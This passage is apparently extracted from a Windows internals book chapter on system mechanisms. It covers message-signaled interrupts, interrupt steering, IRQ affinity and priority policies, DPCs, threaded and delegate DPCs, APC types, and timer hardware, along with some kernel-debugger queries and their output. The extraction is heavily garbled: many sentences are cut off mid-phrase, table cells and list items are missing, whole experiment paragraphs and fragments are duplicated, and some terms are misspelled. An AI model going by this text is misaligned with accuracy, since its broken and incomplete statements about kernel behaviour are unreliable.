(10)Cur:IDT-b5 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(11)Cur:IDT-a5 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(12)Cur:IDT-95 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(14)Cur:IDT-64 Ref-2 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(17)Cur:IDT-54 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(1f)Cur:IDT-a6 Ref-1 Boot-0 lev low Pos:IDT-00 Ref-0 Boot-0 lev unk
(41)Cur:IDT-96 Ref-1 Boot-0 edg hi Pos:IDT-00 Ref-0 Boot-0 lev unk
resources, and other related concepts, see Chapter 6 in Part 1.
CHAPTER 8 System mechanisms
51
the address where the message was delivered. A device can also deliver multiple messages (up to 32) to
the memory address, delivering different payloads based on the event.
which is introduced in PCI 3.0, adds support for 32-bit messages (instead of 16-bit), a maximum of 2048
different messages (instead of just 32), and more importantly, the ability to use a different address
(which can be dynamically determined) for each of the MSI payloads. Using a different address allows
the MSI payload to be written to a different physical address range that belongs to a different proces-
sor, or a different set of target processors, effectively enabling nonuniform memory access (NUMA)-
aware interrupt delivery by sending the interrupt to the processor that initiated the related device
request. This improves latency and scalability by monitoring both load and the closest NUMA node
during interrupt completion.
In either model, because communication is based across a memory value, and because the content
is delivered with the interrupt, the need for IRQ lines is removed (making the total system limit of MSIs
equal to the number of interrupt vectors, not IRQ lines), as is the need for a driver ISR to query the
device for data related to the interrupt, decreasing latency. Due to the large number of device inter-
latency further by directly delivering the interrupt data to the concerned ISR.
utilize the term “GSIV” instead of IRQ because it more generically describes an MSI vector (which is
(GPIO) pin on an embedded device. And, additionally, on ARM and ARM64 systems, neither of these
8-16, you can see the Device Manager on two computer systems showing both traditional IRQ-based
GSIV assignments, as well as MSI values, which are negative.
FIGURE 8-16 IRQ and MSI-based GSIV assignment.
52
CHAPTER 8 System mechanisms
Interrupt steering
-
tween 2 and 16 processors in a single processor group, Windows enables a piece of functionality called
interrupt steering to help with power and latency needs on modern consumer systems. Thanks to this fea-
ture, interrupt load can be spread across processors as needed to avoid bottlenecking a single CPU, and
the core parking engine, which was described in Chapter 6 of Part 1, can also steer interrupts away from
parked cores to avoid interrupt distribution from keeping too many processors awake at the same time.
Interrupt steering capabilities are dependent on interrupt controllers— for example, on ARM systems
with a GIC, both level sensitive and edge (latched) triggered interrupts can be steered, whereas on APIC
systems (unless running under Hyper-V), only level-sensitive interrupts can be steered. Unfortunately,
why Windows also implements an additional interrupt redirection model to handle these situations.
When steering is enabled, the interrupt controller is simply reprogrammed to deliver the GSIV to a
redirection must be used, then
all processors are delivery targets for the GSIV, and whichever processor received the interrupt manu-
ally issues an IPI to the target processor to which the interrupt should be steered toward.
-
ity through a system information class that is handled by KeIntSteerAssignCpuSetForGsiv as part of the
Real-Time Audio capabilities of Windows 10 and the CPU Set feature that was described in the “Thread
of processors that can be chosen by the user-mode application, as long as it has the Increase Base
Priority privilege, which is normally only granted to administrators or local service accounts.
Interrupt affinity and priority
InterruptPolicyValue in the
https://docs.
microsoft.com/en-us/windows-hardware/drivers/kernel/interrupt-affinity-and-priority.
CHAPTER 8 System mechanisms
53
TABLE 8-5
Policy
Meaning
IrqPolicyMachineDefault
default machine policy, which (for machines with less than eight logical
processors) is to select any available processor on the machine.
IrqPolicyAllCloseProcessors
On a NUMA machine, the Plug and Play manager assigns the in-
terrupt to all the processors that are close to the device (on
the same node). On non-NUMA machines, this is the same as
IrqPolicyAllProcessorsInMachine.
IrqPolicyOneCloseProcessor
On a NUMA machine, the Plug and Play manager assigns the interrupt
to one processor that is close to the device (on the same node). On non-
NUMA machines, the chosen processor will be any available processor
on the system.
IrqPolicyAllProcessorsInMachine
The interrupt is processed by any available processor on the machine.
IrqPolicySpecifiedProcessors
IrqPolicySpreadMessagesAcrossAllProcessors
Different message-signaled interrupts are distributed across an optimal
set of eligible processors, keeping track of NUMA topology issues, if pos-
sible. This requires MSI-X support on the device and platform.
IrqPolicyAllProcessorsInGroupWhenSteered
The interrupt is subject to interrupt steering, and as such, the interrupt
should be assigned to all processor IDTs as the target processor will be
dynamically selected based on steering rules.
priority, based on the values in Table 8-6.
TABLE 8-6 IRQ priorities
Priority
Meaning
IrqPriorityUndefined
No particular priority is required by the device. It receives the default priority (IrqPriorityNormal).
IrqPriorityLow
The device can tolerate high latency and should receive a lower IRQL than usual (3 or 4).
IrqPriorityNormal
The device expects average latency. It receives the default IRQL associated with its interrupt vec-
tor (5 to 11).
IrqPriorityHigh
The device requires as little latency as possible. It receives an elevated IRQL beyond its normal
assignment (12).
As discussed earlier, it is important to note that Windows is not a real-time operating system, and
as such, these IRQ priorities are hints given to the system that control only the IRQL associated with
the interrupt and provide no extra priority other than the Windows IRQL priority-scheme mechanism.
Because the IRQ priority is also stored in the registry, administrators are free to set these values for
drivers should there be a requirement of lower latency for a driver not taking advantage of this feature.
54
CHAPTER 8 System mechanisms
Software interrupts
Although hardware generates most interrupts, the Windows kernel also generates software interrupts
for a variety of tasks, including these:
I
Initiating thread dispatching
I
Non-time-critical interrupt processing
I
Handling timer expiration
I
Asynchronously executing a procedure in the context of a particular thread
I
Supporting asynchronous I/O operations
These tasks are described in the following subsections.
Dispatch or deferred procedure call (DPC) interrupts
A DPC is typically an interrupt-related function that performs a processing task after all device inter-
rupts have already been handled. The functions are called deferred because they might not execute
immediately. The kernel uses DPCs to process timer expiration (and release threads waiting for the
DPC IRQL but not really through a regular kernel DPC). Device drivers use DPCs to process interrupts
and perform actions not available at higher IRQLs. To provide timely service for hardware interrupts,
Windows—with the cooperation of device drivers—attempts to keep the IRQL below device IRQL lev-
els. One way that this goal is achieved is for device driver ISRs to perform the minimal work necessary
to acknowledge their device, save volatile interrupt state, and defer data transfer or other less time-
critical interrupt processing activity for execution in a DPC at DPC/dispatch IRQL. (See Chapter 6 in Part
1 for more information on the I/O system.)
In the case where the IRQL is passive or at APC level, DPCs will immediately execute and block all
other non-hardware-related processing, which is why they are also often used to force immediate
execution of high-priority system code. Thus, DPCs provide the operating system with the capability
can no longer continue executing, perhaps because it has terminated or because it voluntarily enters a
wait state, the kernel calls the dispatcher directly to perform an immediate context switch. Sometimes,
however, the kernel detects that rescheduling should occur when it is deep within many layers of code.
In this situation, the kernel requests dispatching but defers its occurrence until it completes its current
activity. Using a DPC software interrupt is a convenient way to achieve this delayed processing.
synchronize access to scheduling-related kernel structures. This disables additional software interrupts
and thread dispatching. When the kernel detects that dispatching should occur, it requests a DPC/dis-
patch-level interrupt; but because the IRQL is at or above that level, the processor holds the interrupt in
check. When the kernel completes its current activity, it sees that it will lower the IRQL below DPC/dis-
patch level and checks to see whether any dispatch interrupts are pending. If there are, the IRQL drops
to DPC/dispatch level, and the dispatch interrupts are processed. Activating the thread dispatcher by
CHAPTER 8 System mechanisms
55
using a software interrupt is a way to defer dispatching until conditions are right. A DPC is represented
by a DPC object, a kernel control object that is not visible to user-mode programs but is visible to de-
vice drivers and other system code. The most important piece of information the DPC object contains
is the address of the system function that the kernel will call when it processes the DPC interrupt. DPC
routines that are waiting to execute are stored in kernel-managed queues, one per processor, called
DPC queues. To request a DPC, system code calls the kernel to initialize a DPC object and then places it
in a DPC queue.
By default, the kernel places DPC objects at the end of one of two DPC queues belonging to the
processor on which the DPC was requested (typically the processor on which the ISR executed). A
device driver can override this behavior, however, by specifying a DPC priority (low, medium, medium-
high, or high, where medium is the default) and by targeting the DPC at a particular processor. A DPC
targeted DPC. If the DPC has a high priority, the kernel inserts the
DPC object at the front of the queue; otherwise, it is placed at the end of the queue for all other priorities.
IRQL (APC or passive level), the kernel processes DPCs. Windows ensures that the IRQL remains at DPC/
is, the kernel “drains” the queue), calling each DPC function in turn. Only when the queue is empty will
the kernel let the IRQL drop below DPC/dispatch level and let regular thread execution continue. DPC
A timer expires, and the kernel
queues a DPC that will release
any threads waiting on the
timer. The kernel then
requests a software interrupt.
When the IRQL drops below
DPC/dispatch level, a DPC
interrupt occurs.
The dispatcher executes each DPC routine
in the DPC queue, emptying the queue as
it proceeds. If required, the dispatcher also
reschedules the processor.
After the DPC interrupt,
control transfers to the
(thread) dispatcher.
High
Power failure
DPC/dispatch
APC
Passive
DPC
queue
IRQL setting
table
•••
DPC
DPC
Dispatcher
1
2
4
3
DPC
FIGURE 8-17 Delivering a DPC.
DPC priorities can affect system behavior another way. The kernel usually initiates DPC queue
draining with a DPC/dispatch-level interrupt. The kernel generates such an interrupt only if the DPC is
directed at the current processor (the one on which the ISR executes) and the DPC has a priority higher
than low. If the DPC has a low priority, the kernel requests the interrupt only if the number of outstand-
ing DPC requests (stored in the DpcQueueDepth
threshold (called MaximumDpcQueueDepth
processor within a time window is low.
56
CHAPTER 8 System mechanisms
is either high or medium-high, the kernel immediately signals the target CPU (by sending it a dispatch IPI)
to drain its DPC queue, but only as long as the target processor is idle. If the priority is medium or low, the
number of DPCs queued on the target processor (this being the DpcQueueDepth again) must exceed a
threshold (the MaximumDpcQueueDepth) for the kernel to trigger a DPC/dispatch interrupt. The system
idle thread also drains the DPC queue for the processor it runs on. Although DPC targeting and priority
8-7 summarizes the situations that initiate DPC queue draining. Medium-high and high appear, and are,
in fact, equal priorities when looking at the generation rules. The difference comes from their insertion in
the list, with high interrupts being at the head and medium-high interrupts at the tail.
TABLE 8-7 DPC interrupt generation rules
DPC Priority
DPC Targeted at ISR’s Processor
DPC Targeted at Another Processor
Low
DPC queue length exceeds maximum DPC queue
length, or DPC request rate is less than minimum
DPC request rate
DPC queue length exceeds maximum DPC queue
length, or system is idle
Medium
Always
DPC queue length exceeds maximum DPC queue
length, or system is idle
Medium-High
Always
Target processor is idle
High
Always
Target processor is idle
Additionally, Table 8-8 describes the various DPC adjustment variables and their default values, as
set by using the SystemDpcBehaviorInformation system information class.
TABLE 8-8 DPC interrupt generation variables
Variable
Definition
Default Override Value
Number of DPCs queued before an interrupt will be
sent even for Medium or below DPCs
4
DpcQueueDepth
Number of DPCs per clock tick where low DPCs will
not cause a local interrupt to be generated
3
MinimumDpcRate
Number of DPCs per clock tick before the maximum
DPC queue depth is decremented if DPCs are pending
but no interrupt was generated
20
IdealDpcRate
Number of clock ticks before the maximum DPC
20
AdjustDpcThreshold
Because user-mode threads execute at low IRQL, the chances are good that a DPC will interrupt
-
faults, or create or wait for dispatcher objects (explained later in this chapter). They can, however, ac-
cess nonpaged system memory addresses, because system address space is always mapped regardless
of what the current process is.
CHAPTER 8 System mechanisms
57
Because all user-mode memory is pageable and the DPC executes in an arbitrary process context,
DPC code should never access user-mode memory in any way. On systems that support Supervisor
Mode Access Protection (SMAP) or Privileged Access Neven (PAN), Windows activates these features
for the duration of the DPC queue processing (and routine execution), ensuring that any user-mode
memory access will immediately result in a bugcheck.
Another side effect of DPCs interrupting the execution of threads is that they end up “stealing”
from the run time of the thread; while the scheduler thinks that the current thread is executing, a DPC
is executing instead. In Chapter 4, Part 1, we discussed mechanisms that the scheduler uses to make
up for this lost time by tracking the precise number of CPU cycles that a thread has been running and
deducting DPC and ISR time, when applicable.
wall time (also sometimes called clock time—the real-life passage of time) is still
being spent on something else. Imagine a user currently streaming their favorite song off the Internet:
If a DPC were to take 2 seconds to run, those 2 seconds would result in the music skipping or repeat-
ing in a small loop. Similar impacts can be felt on video streaming or even keyboard and mouse input.
Because of this, DPCs are a primary cause for perceived system unresponsiveness of client systems or
workstation workloads because even the highest-priority thread will be interrupted by a running DPC.
threaded DPCs. Threaded DPCs,
as their name implies, function by executing the DPC routine at passive level on a real-time priority
(priority 31) thread. This allows the DPC to preempt most user-mode threads (because most application
and other priority 31 threads to preempt the routine.
The threaded DPC mechanism is enabled by default, but you can disable it by adding a DWORD val-
ue named ThreadDpcEnable
KeInitializeThreadedDpc API, which sets the DPC internal type to ThreadedDpcObject. Because threaded
DPCs can be disabled, driver developers who make use of threaded DPCs must write their routines
following the same rules as for nonthreaded DPC routines and cannot access paged memory, perform
dispatcher waits, or make assumptions about the IRQL level at which they are executing. In addition,
they must not use the KeAcquire/ReleaseSpinLockAtDpcLevel APIs because the functions assume the
CPU is at dispatch level. Instead, threaded DPCs must use KeAcquire/ReleaseSpinLockForDpc, which
performs the appropriate action after checking the current IRQL.
system administrator. As such, the vast majority of DPCs still execute nonthreaded and can result in
perceived system lag. Windows employs a vast arsenal of performance tracking mechanisms to diag-
through performance counters, as well as through precise ETW tracing.
58
CHAPTER 8 System mechanisms
EXPERIMENT: Monitoring DPC activity
You can use Process Explorer to monitor DPC activity by opening the System Information dialog
box and switching to the CPU tab, where it lists the number of interrupts and DPCs executed each
time Process Explorer refreshes the display (1 second by default):
EXPERIMENT: Monitoring DPC activity
You can use Process Explorer to monitor DPC activity by opening the System Information dialog
box and switching to the CPU tab, where it lists the number of interrupts and DPCs executed each
time Process Explorer refreshes the display (1 second by default):
CHAPTER 8 System mechanisms
59
with Dpc, such as DpcRequestRate, DpcLastCount, DpcTime, and DpcData (which contains the
DpcQueueDepth and DpcCount for both nonthreaded and threaded DPCs). Additionally, newer
versions of Windows also include an IsrDpcStats_ISRDPCSTATS
nonthreaded) versus the number that have executed:
lkd> dx new { QueuedDpcCount = @$prcb->DpcData[0].DpcCount + @$prcb->DpcData[1].DpcCount,
ExecutedDpcCount = ((nt!_ISRDPCSTATS*)@$prcb->IsrDpcStats)->DpcCount },d
QueuedDpcCount : 3370380
ExecutedDpcCount : 1766914 [Type: unsigned __int64]
The discrepancy you see in the example output is expected; drivers might have queued a DPC
that was already in the queue, a condition that Windows handles safely. Additionally, a DPC
execute on a different processor, such as when the driver uses KeSetTargetProcessorDpc (the API
allows a driver to target the DPC to a particular processor.)
DPCTimeout, DpcWatchdogPeriod, and DpcWatchdogProfileOffset.
The DPC Watchdog is responsible for monitoring all execution of code at DISPATCH_LEVEL or
above, where a drop in IRQL has not been registered for quite some time. The DPC Timeout, on the
20 seconds, and all DISPATCH_LEVEL (and above) execution times out after 2 minutes. Both limits are
DPCTimeout
limit, whereas the DpcWatchdogPeriod controls the combined execution of all the code running at
high IRQL). When these thresholds are hit, the system will either bugcheck with DPC_WATCHDOG_
VIOLATION (indicating which of the situations was encountered), or, if a kernel debugger is attached,
raise an assertion that can be continued.
Driver developers who want to do their part in avoiding these situations can use the
KeQueryDpcWatchdogInformation
KeShouldYieldProcessor API takes these values (and other system state values) into
consideration and returns to the driver a hint used for making a decision whether to continue its DPC
work later, or if possible, drop the IRQL back to PASSIVE_LEVEL-
ing, but the driver was holding a lock or synchronizing with a DPC in some way).
On the latest builds of Windows 10, each PRCB also contains a DPC Runtime History Table
(DpcRuntimeHistoryHashTable
functions that have recently executed and the amount of CPU cycles that they spent running. When
with Dpc, such as DpcRequestRate, DpcLastCount,
DpcLastCount,
DpcLastCount DpcTime, and DpcData (which contains the
DpcQueueDepth and DpcCount for both nonthreaded and threaded DPCs). Additionally, newer
DpcCount for both nonthreaded and threaded DPCs). Additionally, newer
DpcCount
versions of Windows also include an IsrDpcStats_ISRDPCSTATS
nonthreaded) versus the number that have executed:
lkd> dx new { QueuedDpcCount = @$prcb->DpcData[0].DpcCount + @$prcb->DpcData[1].DpcCount,
ExecutedDpcCount = ((nt!_ISRDPCSTATS*)@$prcb->IsrDpcStats)->DpcCount },d
QueuedDpcCount : 3370380
ExecutedDpcCount : 1766914 [Type: unsigned __int64]
The discrepancy you see in the example output is expected; drivers might have queued a DPC
that was already in the queue, a condition that Windows handles safely. Additionally, a DPC
execute on a different processor, such as when the driver uses KeSetTargetProcessorDpc (the API
KeSetTargetProcessorDpc (the API
KeSetTargetProcessorDpc
allows a driver to target the DPC to a particular processor.)
60
CHAPTER 8 System mechanisms
access to a UI tool, but more importantly, this data is also now used by the kernel.
When a driver developer queues a DPC through KeInsertQueueDpc, the API will enumerate the
LongDpcRuntimeThreshold regis-
this is the case, the LongDpcPresentDpcData structure mentioned earlier.
thread), the kernel now also creates a DPC Delegate Thread. These are highly unique threads that
thread selection algorithms. They are merely kept in the back pocket of the kernel for its own purposes.
delegate threads. Note that in this case, these threads have a real Thread ID (TID), and the Processor
column should be treated as such for them.
FIGURE 8-18 The DPC delegate threads on a 16-CPU system.
CHAPTER 8 System mechanisms
61
Whenever the kernel is dispatching DPCs, it checks whether the DPC queue depth has passed the
threshold of such long-running
by looking at the properties of the currently executing thread: Is it idle? Is it a real-time thread? Does
kernel may decide to schedule the DPC delegate thread instead, essentially swapping the DPC from its
thread-starving position into a dedicated thread, which has the highest priority possible (still execut-
ing at DISPATCH_LEVEL). This gives a chance to the old preempted thread (or any other thread in the
standby list) to be rescheduled to some other CPU.
This mechanism is similar to the Threaded DPCs we explained earlier, with some exceptions. The
delegate thread still runs at DISPATCH_LEVEL. Indeed, when it is created and started in phase 1 of the
NT kernel initialization (see Chapter 12 for more details), it raises its own IRQL to DISPATCH level, saves
it in the WaitIrql
a context switch to another standby or ready thread (via the KiSwapThread routine.) Thus, the delegate
DPCs provide an automatic balancing action that the system takes, instead of an opt-in that driver
developers must judiciously leverage on their own.
If you have a newer Windows 10 system with this capability, you can run the following command in
the kernel debugger to take a look at how often the delegate thread was needed, which you can infer
from the amount of context switches that have occurred since boot:
lkd> dx @$cursession.Processes[0].Threads.Where(t => t.KernelObject.ThreadName->
ToDisplayString().Contains("DPC Delegate Thread")).Select(t => t.KernelObject.Tcb.
ContextSwitches),d
[44]
: 2138 [Type: unsigned long]
[52]
: 4 [Type: unsigned long]
[60]
: 11 [Type: unsigned long]
[68]
: 6 [Type: unsigned long]
[76]
: 13 [Type: unsigned long]
[84]
: 3 [Type: unsigned long]
[92]
: 16 [Type: unsigned long]
[100]
: 19 [Type: unsigned long]
[108]
: 2 [Type: unsigned long]
[116]
: 1 [Type: unsigned long]
[124]
: 2 [Type: unsigned long]
[132]
: 2 [Type: unsigned long]
[140]
: 3 [Type: unsigned long]
[148]
: 2 [Type: unsigned long]
[156]
: 1 [Type: unsigned long]
[164]
: 1 [Type: unsigned long]
Asynchronous procedure call interrupts
Asynchronous procedure calls (APCs) provide a way for user programs and system code to execute
in the context of a particular user thread (and hence a particular process address space). Because
APCs are queued to execute in the context of a particular thread, they are subject to thread schedul-
ing rules and do not operate within the same environment as DPCs—namely, they do not operate at
DISPATCH_LEVEL and can be preempted by higher priority threads, perform blocking waits, and access
pageable memory.
62
CHAPTER 8 System mechanisms
That being said, because APCs are still a type of software interrupt, they must somehow still be able
APC_LEVEL
operate under the same restrictions as a DPC, there are still certain limitations imposed that developers
APCs are described by a kernel control object, called an APC object. APCs waiting to execute reside
in one of two kernel-managed APC queues. Unlike the DPC queues, which are per-processor (and di-
vided into threaded and nonthreaded), the APC queues are per-thread—with each thread having two
APC queues: one for kernel APCs and one for user APCs.
When asked to queue an APC, the kernel looks at the mode (user or kernel) of the APC and then
inserts it into the appropriate queue belonging to the thread that will execute the APC routine. Before
When an APC is queued against a thread, that thread may be in one of the three following situations:
I
The thread is currently running (and may even be the current thread).
I
The thread is currently waiting.
I
The thread is doing something else (ready, standby, and so on).
alertable
state whenever performing a wait. Unless APCs have been completely disabled for a thread, for kernel
APCs, this state is ignored—the APC always aborts the wait, with consequences that will be explained
user APCs however, the thread is interrupted only if the wait was alertable and
instantiated on behalf of a user-mode component or if there are other pending user APCs that already
started aborting the wait (which would happen if there were lots of processors trying to queue an APC
to the same thread).
either perform an alertable wait or go through a ring transition or context switch that revisits the User
raising the IRQL to APC_LEVEL, notifying the processor that it must look at the kernel APC queue of its
currently running thread. And, in both scenarios, if the thread was doing “something else,” some transi-
tion that takes it into either the running or waiting state needs to occur. As a practical result of this,
We mentioned that APCs could be disabled for a thread, outside of the previously described scenar-
being to simply keep their IRQL at APC_LEVEL or above while executing some piece of code. Because
-
plained, if the processor is already at APC_LEVEL (or higher), the interrupt is masked out. Therefore, it is
only once the IRQL has dropped to PASSIVE_LEVEL that the pending interrupt is delivered, causing the
APC to execute.
CHAPTER 8 System mechanisms
63
The second mechanism, which is strongly preferred because it avoids changing interrupt controller
state, is to use the kernel API KeEnterGuardedRegion, pairing it with KeLeaveGuardedRegion when you
want to restore APC delivery back to the thread. These APIs are recursive and can be called multiple
times in a nested fashion. It is safe to context switch to another thread while still in such a region
SpecialApcDisable and
not per-processor state.
Similarly, context switches can occur while at APC_LEVEL, even though this is per-processor state.
WaitIrql and then sets the processor
IRQL to the WaitIrql of the new incoming thread (which could be PASSIVE_LEVEL). This creates an
Such a possibility is common and entirely normal, proving that when it comes to thread execution, the
scheduler outweighs any IRQL considerations. It is only by raising to DISPATCH_LEVEL, which disables
thread preemption, that IRQLs supersede the scheduler. Since APC_LEVEL is the only IRQL that ends up
behaving this way, it is often called a thread-local IRQL
approximation for the behavior described herein.
Regardless of how APCs are disabled by a kernel developer, one rule is paramount: Code can neither
return to user mode with the APC at anything above PASSIVE_LEVEL nor can SpecialApcDisable be set
to anything but 0. Such situations result in an immediate bugcheck, typically meaning some driver has
forgotten to release a lock or leave its guarded region.
In addition to two APC modes, there are two types of APCs for each mode—normal APCs and spe-
cial APCs—both of which behave differently depending on the mode. We describe each combination:
I
Special Kernel APC This combination results in an APC that is always inserted at the tail of
all other existing special kernel APCs in the APC queue but before any normal kernel APCs. The
kernel routine receives a pointer to the arguments and to the normal routine of the APC and
operates at APC_LEVEL, where it can choose to queue a new, normal APC.
I
Normal Kernel APC This type of APC is always inserted at the tail end of the APC queue, al-
lowing for a special kernel APC to queue a new normal kernel APC that will execute soon there-
after, as described in the earlier example. These kinds of APCs can not only be disabled through
the mechanisms presented earlier but also through a third API called KeEnterCriticalRegion
(paired with KeLeaveCriticalRegion), which updates the KernelApcDisable counter in KTHREAD
but not SpecialApcDisable.
I
kernel routine at APC_LEVEL, sending it pointers to the argu-
ments and the normal routine
drop the IRQL to PASSIVE_LEVEL and execute the normal routine as well, with the input argu-
ments passed in by value this time. Once the normal routine returns, the IRQL is raised back to
APC_LEVEL again.
I
Normal User APC This typical combination causes the APC to be inserted at the tail of the
APC queue and for the kernel routineAPC_LEVEL in the same way as the
preceding bullet. If a normal routine is still present, then the APC is prepared for user-mode
64
CHAPTER 8 System mechanisms
delivery (obviously, at PASSIVE_LEVEL) through the creation of a trap frame and exception
frame that will eventually cause the user-mode APC dispatcher in Ntdll.dll to take control of the
thread once back in user mode, and which will call the supplied user pointer. Once the user-
mode APC returns, the dispatcher uses the NtContinue or NtContinueEx system call to return to
the original trap frame.
I
Note that if the kernel routine ended up clearing out the normal routine, then the thread, if
alerted, loses that state, and, conversely, if not alerted, becomes alerted, and the user APC
performed by the KeTestAlertThread
executed in user mode, even though the kernel routine cancelled the dispatch.
I
Special User APC This combination of APC is a recent addition to newer builds of Windows 10
and generalizes a special dispensation that was done for the thread termination APC such that
(noncurrent) thread requires the use of an APC, but it must also only occur once all kernel-mode
quite well, but it would mean that a user-mode developer could avoid termination by perform-
kernel routine of a User
APC was KiSchedulerApcTerminate. In this situation, the User APC was recognized as being “special”
pending” state was always set, which forced execution of the APC at the next user-mode ring transi-
tion or context switch to this thread.
This functionality, however, being solely reserved for the termination code path, meant that develop-
ers who want to similarly guarantee the execution of their User APC, regardless of alertability state,
had to resort to using more complex mechanisms such as manually changing the context of the
thread using SetThreadContext, which is error-prone at best. In response, the QueueUserAPC2 API was
created, which allows passing in the QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
exposing similar functionality to developers as well. Such APCs will always be added before any other
user-mode APCs (except the termination APC, which is now extra special) and will ignore the alertable
as a special user APC.
Table 8-9 summarizes the APC insertion and delivery behavior for each type of APC.
The executive uses kernel-mode APCs to perform operating system work that must be completed
within the address space (in the context) of a particular thread. It can use special kernel-mode APCs to
direct a thread to stop executing an interruptible system service, for example, or to record the results
kernel-mode APCs to make a thread suspend or terminate itself or to get or set its user-mode execu-
tion context. The Windows Subsystem for Linux (WSL) uses kernel-mode APCs to emulate the delivery
of UNIX signals to Subsystem for UNIX Application processes.
CHAPTER 8 System mechanisms
65
TABLE 8-9 APC insertion and delivery
APC Type
Insertion Behavior
Delivery Behavior
Special (kernel)
Inserted right after the last spe-
cial APC (at the head of all other
normal APCs)
drops, and the thread is not in a guarded region. It is
the APC.
Normal (kernel)
Inserted at the tail of the kernel-
mode APC list
APC_LEVEL as soon as IRQL
drops, and the thread is not in a critical (or guarded)
inserting the APC. Executes the normal routine, if any,
at PASSIVE_LEVEL after the associated kernel routine
was executed. It is given arguments returned by the as-
sociated kernel routine (which can be the original argu-
ments used during insertion or new ones).
Normal (user)
Inserted at the tail of the user-
mode APC list
APC_LEVEL as soon as IRQL
set (indicating that an APC was queued while the thread
was in an alertable wait state). It is given pointers to
Executes the normal routine, if any, in user mode at
PASSIVE_LEVEL after the associated kernel routine is
executed. It is given arguments returned by the associ-
ated kernel routine (which can be the original argu-
ments used during insertion or new ones). If the normal
routine was cleared by the kernel routine, it performs a
test-alert against the thread.
User Thread
Terminate APC
(KiSchedulerApcTerminate)
Inserted at the head of the user-
mode APC list
-
lows similar rules as described earlier but delivered
at PASSIVE_LEVEL on return to user mode, no matter
what. It is given arguments returned by the thread-
termination special APC.
Special (user)
Inserted at the head of the
user-mode APC list but after the
thread terminates APC, if any.
Same as above, but arguments are con-
trolled by the caller of QueueUserAPC2
(NtQueueApcThreadEx2
KeSpecialUserApcKernelRoutine function that re-inserts
the APC, converting it from the initial special kernel
APC to a special user APC.
Another important use of kernel-mode APCs is related to thread suspension and termination. Because
these operations can be initiated from arbitrary threads and directed to other arbitrary threads, the
kernel uses an APC to query the thread context as well as to terminate the thread. Device drivers often
block APCs or enter a critical or guarded region to prevent these operations from occurring while they are
holding a lock; otherwise, the lock might never be released, and the system would hang.
goes into a wait state, another thread in another process can be scheduled to run. When the device
initiated the I/O so that it can copy the results of the I/O operation to the buffer in the address space
of the process containing that thread. The I/O system uses a special kernel-mode APC to perform this
action unless the application used the SetFileIoOverlappedRange API or I/O completion ports. In that
case, the buffer will either be global in memory or copied only after the thread pulls a completion item
from the port. (The use of APCs in the I/O system is discussed in more detail in Chapter 6 of Part 1.)
66
CHAPTER 8 System mechanisms
Several Windows APIs—such as ReadFileEx, WriteFileEx, and QueueUserAPC—use user-mode APCs.
ReadFileEx and WriteFileEx functions allow the caller to specify a completion routine
alertable wait state. A thread can enter a wait state either by waiting for an object handle and specify-
ing that its wait is alertable (with the Windows WaitForMultipleObjectsEx function) or by testing directly
whether it has a pending APC (using SleepEx). In both cases, if a user-mode APC is pending, the kernel
when the APC routine completes. Unlike kernel-mode APCs, which can execute at APC_LEVEL, user-
mode APCs execute at PASSIVE_LEVEL.
APC delivery can reorder the wait queues—the lists of which threads are waiting for what, and in
what order they are waiting. (Wait resolution is described in the section “Low-IRQL synchronization,”
later in this chapter.) If the thread is in a wait state when an APC is delivered, after the APC routine
are used to suspend a thread from execution, if the thread is waiting for any objects, its wait is removed
until the thread is resumed, after which that thread will be at the end of the list of threads waiting to
access the objects it was waiting for. A thread performing an alertable kernel-mode wait will also be
woken up during thread termination, allowing such a thread to check whether it woke up as a result of
termination or for a different reason.
Timer processing
-
denced by its high IRQL value (CLOCK_LEVEL) and due to the critical nature of the work it is responsible
for. Without this interrupt, Windows would lose track of time, causing erroneous results in calcula-
tions of uptime and clock time—and worse, causing timers to no longer expire, and threads never to
consume their quantum. Windows would also not be a preemptive operating system, and unless the
current running thread yielded the CPU, critical background tasks and scheduling could never occur on
a given processor.
Timer types and intervals
-
chine, and subsequently allowed drivers, applications, and administrators to modify the clock interval
Programmable Interrupt Timer (PIT) chip that has been present on all computers since the PC/AT or
the Real Time Clock (RTC). The PIT works on a crystal that is tuned at one-third the NTSC color carrier
various achievable multiples to reach millisecond-unit intervals, starting at 1 ms all the way up to 15 ms.
run at various intervals that are also powers of two. On RTC-based systems, the APIC Multiprocessor
CHAPTER 8 System mechanisms
67
The PIT and RTC have numerous issues: They are slow, external devices on legacy buses, have poor
granularity, force all processors to synchronize access to their hardware registers, are a pain to emu-
late, and are increasingly no longer found on embedded hardware devices, such as IoT and mobile. In
response, hardware vendors created new types of timers, such as the ACPI Timer, also sometimes called
the Power Management (PM) Timer, and the APIC Timer (which lives directly on the processor). The
Timer, or HPET, which a much-improved version of the RTC. On systems with an HPET, it is used instead
of the RTC or PIC. Additionally, ARM64 systems have their own timer architecture, called the Generic
on a given system, using the following order:
1.
virtual machine.
2.
3.
4.
kind of HPET.
5.
If no HPET was found, use the RTC.
6.
7.
which should never happen.
The HPET and the LAPIC Timer have one more advantage—other than only supporting the typical
periodic one shot mode. This capability will
allow recent versions of Windows to leverage a dynamic tick model, which we explain later.
Timer granularity
Some types of Windows applications require very fast response times, such as multimedia applications.
rate (that functionality was added later, through enhanced timers, which we cover in an upcoming sec-
tion); instead, they end up increasing the resolution of all timers in the system, potentially causing other
timers to expire more frequently, too.
68
CHAPTER 8 System mechanisms
That being said, Windows tries its best to restore the clock timer back to its original value whenever
it can. Each time a process requests a clock interval change, Windows increases an internal reference
count and associates it with the process. Similarly, drivers (which can also change the clock rate) get
added to the global reference count. When all drivers have restored the clock and all processes that
EXPERIMENT: Identifying high-frequency timers
Due to the problems that high-frequency timers can cause, Windows uses Event Tracing for
interval, displaying the time of the occurrence and the requested interval. The current interval
is also shown. This data is of great use to both developers and system administrators in identify-
ing the causes of poor battery performance on otherwise healthy systems, as well as to decrease
overall power consumption on large systems. To obtain it, simply run powercfg /energy, and
energy-report.html, similar to the one shown here:
EXPERIMENT: Identifying high-frequency timers
Due to the problems that high-frequency timers can cause, Windows uses Event Tracing for
interval, displaying the time of the occurrence and the requested interval. The current interval
is also shown. This data is of great use to both developers and system administrators in identify-
